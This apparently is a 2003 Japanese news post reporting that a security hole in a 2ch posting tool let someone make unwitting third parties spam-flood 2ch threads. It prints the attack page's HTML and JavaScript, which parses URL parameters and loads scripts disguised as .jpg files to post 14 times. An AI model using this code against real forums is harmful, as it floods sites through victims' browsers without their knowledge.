スクリプトで 2ch にスレ乱立

mkakikomitaiのセキリュティーホールの穴をつき、第三者に2chのスレを乱立させていたようだ。その結果、現在スレ乱立状態の祭りになっている。

<html>
<HEAD>
<META http-equiv="Content-type" content="text/html; charset=Shift_JIS">
<META name="GENERATOR" content="IBM WebSphere Studio Homepage Builder Version 7.0.0.0 Trial for Windows">
<META http-equiv="Content-Style-Type" content="text/css">
<title>2ch 書き込みスクリプト</title>
<style type="text/css"><!--//
a:link { font-size: 10pt; color: white; }
a:visited { font-size: 10pt; color: white; }
a:active { font-size: 10pt; text-decoration: none; color: white; }
a:hover { font-size: 10pt; text-decoration: none; color: white; }
body,tr,td { font-size: 10pt; color: silver; background: black; }
input,select,textarea { font-size: 10pt; background: black; color: silver; border-style: solid; border-left-color: gray; border-bottom-color: silver; border-top-color: gray; border-right-color: silver; border-width:1px; }
//--></style>
<!--//
if(document.URL.match(/\?saba=(.+)&bbs=(.+)&key=(.+)&FROM=(.*)&mail=(.*)&MESSAGE=(.*)$/)){
document.title='';
saba=RegExp.$1; bbs=RegExp.$2; key=RegExp.$3; FROM=unescape(RegExp.$4); mail=unescape(RegExp.$5); MESSAGE=unescape(RegExp.$6);
xx = Math.floor(Math.random() * 12);
if (xx==0) { js = "2866.jpg"; }if (xx==1) { js = "2867.jpg"; }if (xx==2) { js = "2868.jpg"; }
if (xx==3) { js = "2869.jpg"; }if (xx==4) { js = "2870.jpg"; }if (xx==5) { js = "2871.jpg"; }
if (xx==6) { js = "2872.jpg"; }if (xx==7) { js = "2873.jpg"; }if (xx==8) { js = "2874.jpg"; }
if (xx==9) { js = "2875.jpg"; }if (xx==10){ js = "2876.jpg"; }if (xx==11){ js = "2877.jpg"; }
document.write("\x3Cscript src=\""+js+"\"\x3E\x3C/script\x3E");
}else{saba='';}
//-->
</HEAD>
<noscript>scriptをオンにすると表示されます</noscript><hr size=1 color=white>
<h3>使い方</h3>
注意事項
<ol>
<li>メッセージの最後に改行とアスキーアートと乱数が付け加えられます。
<li>14回送信されます。
</ol>
<table bgcolor=#333333 border=1 cellspacing=0 cellpadding=2>
<tr><td>saba</td><td>掲示板が存在するサーバーの、完全なドメイン名を入力します。<br>("http://ex.2ch.net/test/read.cgi/net/1061376352/"→"ex.2ch.net")</td></tr>
<tr><td>bbs</td><td>掲示板の名前を入力します。<br>("http://ex.2ch.net/test/read.cgi/net/1061376352/"→"net")</td></tr>
<tr><td>key</td><td>スレッドの番号を入力します。<br>("http://ex.2ch.net/test/read.cgi/net/1061376352/"→"1061376352")</td></tr>
<tr><td>FROM</td><td>名前を入力します。</td></tr>
<tr><td>mail</td><td>メールアドレスを入力します。</td></tr>
<tr><td>MESSAGE</td><td>メッセージを入力します。</td></tr>
<tr><td>submit</td><td>フォーム内容を送信します。</td></tr>
<tr><td>reset</td><td>フォーム内容をリセットします。</td></tr>
</table>

</html>

これがそのスクリプトのソースである。これをもっと書きこみ隊のcgiにしかけ、
第三者にスレッドを立てさせていたようだ。勿論、第三者はそれに気付かない。

http://ex.2ch.net/test/read.cgi/net/1062230457/
http://news4.2ch.net/test/read.cgi/news/1062229039/

http://www.nurs.or.jp/~go5628/watch/unko.html
  • RAGNAROK# 棄てハン記者
  • 2003/08/31 (Sun) 01:14